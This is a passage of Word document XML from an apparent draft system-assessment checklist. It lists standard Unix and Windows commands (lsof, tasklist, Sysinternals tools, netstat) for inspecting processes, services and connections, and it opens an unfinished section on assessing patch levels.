      <w:r w:rsidRPr="00353DCC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>nap</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Can show processes on some systems</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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lsof</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00353DCC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> | grep &lt;port number&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>find process if lsof is installed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0013443A" w:rsidRPr="00353DCC" w:rsidRDefault="0013443A" w:rsidP="00353DCC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013443A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>NETSTAP –AN</w:t>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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0013443A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>solaris ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00E35F6C" w:rsidRDefault="00E35F6C" w:rsidP="008876A5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000A257D" w:rsidRPr="00353DCC" w:rsidRDefault="000A257D" w:rsidP="008876A5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E35F6C">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Windows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A257D" w:rsidRPr="00E35F6C" w:rsidRDefault="000A257D" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E35F6C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Task Manager (gui): taskmgr.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E35F6C" w:rsidRDefault="000A257D" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E35F6C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Tasklist (cmd): </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A257D" w:rsidRPr="00E35F6C" w:rsidRDefault="000A257D" w:rsidP="00E35F6C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>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 xml:space="preserve">tasklist.exe </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/v</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verbose</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/m</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dll modules use</w:t>
      </w:r>
      <w:r w:rsidR="00596356" w:rsidRPr="00E35F6C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>d per process</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/svc</w:t>
      </w:r>
      <w:r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services within process</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/s</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remote system (/u /p username and password to connect with)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00596356" w:rsidRPr="00E35F6C" w:rsidRDefault="000A257D" w:rsidP="00E35F6C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:ind w:left="2160" w:hanging="1800"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E35F6C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E35F6C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>fe</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E35F6C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>filter (e.g. system processes:  tasklist /FI "USERNAME eq NT AUTHORITY\SYSTEM"</w:t>
      </w:r>
      <w:r w:rsidR="00596356" w:rsidRPr="00E35F6C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A257D" w:rsidRPr="00E35F6C" w:rsidRDefault="000A257D" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E35F6C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Processes Explorer (sysinternals</w:t>
      </w:r>
      <w:r w:rsidR="00596356" w:rsidRPr="00E35F6C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> gui</w:t>
      </w:r>
      <w:r w:rsidRPr="00E35F6C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">): procexp.exe </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E35F6C" w:rsidRDefault="00596356" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E35F6C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">psinfo (sysinternals): </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A257D"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psinfo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E35F6C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -s </w:t>
      </w:r>
      <w:r w:rsidR="00E35F6C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>show all software+hotfixes</w:t>
      </w:r>
      <w:r w:rsidRPr="00E35F6C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E35F6C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E35F6C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">-p –u </w:t>
      </w:r>
      <w:r w:rsidR="00E35F6C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>password username \\remote)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E35F6C" w:rsidRDefault="00596356" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E35F6C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pslist (sysinternals): </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00596356" w:rsidRPr="00E35F6C" w:rsidRDefault="00596356" w:rsidP="0039512C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0039512C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:t>pslist</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0039512C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:t xml:space="preserve"> -t </w:t>
      </w:r>
      <w:r w:rsidR="00E35F6C" w:rsidRPr="0039512C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0039512C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:t>(show process tree, -p –u password username \\remote</w:t>
      </w:r>
      <w:r w:rsidRPr="00E35F6C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E35F6C" w:rsidRDefault="00596356" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E35F6C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">psservice (sysinternals): </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00596356"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psservice</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E35F6C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E35F6C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>show / configure services</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00596356"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security</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E35F6C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E35F6C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>show security info</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00596356" w:rsidRPr="00E35F6C" w:rsidRDefault="00E35F6C"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config</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E35F6C">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get service config</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00596356" w:rsidRDefault="00E35F6C"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setconfig</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E35F6C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>args</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>set service config with args</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRPr="00E35F6C" w:rsidRDefault="00B50C46" w:rsidP="00E35F6C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>start/stop</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> svc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">start/stop service(svc) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E35F6C" w:rsidRDefault="00596356" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E35F6C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Tcpvcon (sysinte</w:t>
      </w:r>
      <w:r w:rsidR="00E35F6C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rals):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A257D" w:rsidRPr="00E35F6C" w:rsidRDefault="00596356" w:rsidP="00E35F6C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>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 xml:space="preserve">tcpvcon.exe </w:t>
      </w:r>
      <w:r w:rsidR="00E35F6C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E35F6C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>na</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E35F6C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B50C46">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">show </w:t>
      </w:r>
      <w:r w:rsidR="00E35F6C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">all </w:t>
      </w:r>
      <w:r w:rsidR="00B50C46">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>tcp endpoints without resolve names</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00353DCC" w:rsidRDefault="000A257D" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E35F6C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Tcpview (sysinternals): </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A257D" w:rsidRPr="00353DCC" w:rsidRDefault="000A257D" w:rsidP="00353DCC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00353DCC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>tcpview.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E35F6C" w:rsidRDefault="00596356" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E35F6C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">netstat: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A257D" w:rsidRPr="00E35F6C" w:rsidRDefault="000A257D"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netstat</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E35F6C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –nab</w:t>
      </w:r>
      <w:r w:rsidR="00B50C46">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">show </w:t>
      </w:r>
      <w:r w:rsidR="00E35F6C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">all sockets </w:t>
      </w:r>
      <w:r w:rsidR="00B50C46">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00E35F6C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>associated process</w:t>
      </w:r>
      <w:r w:rsidR="00B50C46">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> without resolving</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A257D" w:rsidRDefault="000A257D" w:rsidP="008876A5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008876A5" w:rsidRPr="008876A5" w:rsidRDefault="008876A5" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>B14b - Assessing patch levels</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008876A5" w:rsidRDefault="00E35F6C" w:rsidP="008876A5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Unix</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E35F6C" w:rsidRDefault="00E35F6C" w:rsidP="008876A5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E35F6C" w:rsidRDefault="00E35F6C" w:rsidP="008876A5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Solaris: </w:t>
      </w:r>
      <w:r w:rsidR="00B50C46" w:rsidRPr="00B50C46">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pca script</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E35F6C" w:rsidRDefault="00E35F6C" w:rsidP="008876A5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00B50C46">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B50C46">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>??</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B50C46">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00B50C46">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B50C46">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B50C46" w:rsidRPr="00B50C46">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>various flavours</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E35F6C" w:rsidRDefault="00E35F6C" w:rsidP="008876A5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E35F6C" w:rsidRDefault="00E35F6C" w:rsidP="008876A5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Windows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E35F6C" w:rsidRPr="00B50C46" w:rsidRDefault="00E35F6C" w:rsidP="008876A5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B50C46">
